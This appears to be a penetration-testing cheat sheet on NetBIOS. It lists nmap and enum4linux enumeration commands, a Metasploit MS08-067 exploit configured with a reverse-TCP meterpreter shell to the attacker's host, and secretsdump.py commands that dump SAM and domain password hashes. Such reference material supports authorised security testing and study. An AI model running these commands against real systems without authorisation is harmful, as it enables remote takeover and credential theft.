NetBIOS
Default Port: 137, 138, 139
NetBIOS (Network Basic Input/Output System) is a protocol used for communication within a local network. It allows applications on different computers to communicate over a local area network (LAN), primarily used in early Windows-based networks for name resolution and sharing services like files and printers. Though its usage has decreased over time with the introduction of more secure and scalable solutions, some networks might still have devices using NetBIOS, potentially exposing them to cybersecurity risks.
Recon
Identifying NetBIOS
You can use Nmap to check if there's an NetBIOS service on a target host like this:
nmap -p 137,138,139 X.X.X.X
Enumeration
NetBIOS Name Service
NetBIOS operates primarily on ports 137/udp for name services, 138/udp for datagram distribution, and 139/tcp for session services. The name service component is crucial for translating human-friendly computer names within the network into their corresponding IP addresses.
To explore the network and find available NetBIOS names, use the following commands:
nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
Enumerating Shares and Sessions
enum4linux
enum4linux is a tool for enumerating information from Windows and Samba systems.
enum4linux -a X.X.X.X
This command attempts to retrieve as much information as possible including shares, sessions, and usernames.
Attack Vectors
Exploiting Known Vulnerabilities
Some well-known vulnerabilities might be present in NetBIOS services, depending on the system's configuration and patch level.
MS08-067
MS08-067 is a critical vulnerability in Microsoft Server Message Block (SMB) that could allow remote code execution.
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST <target-ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Post-Exploitation
Dumping Hashes
Dump the SAM database hashes using secretsdump.py from Impacket suite:
secretsdump.py -just-dc <domain>/<user>@<target-ip>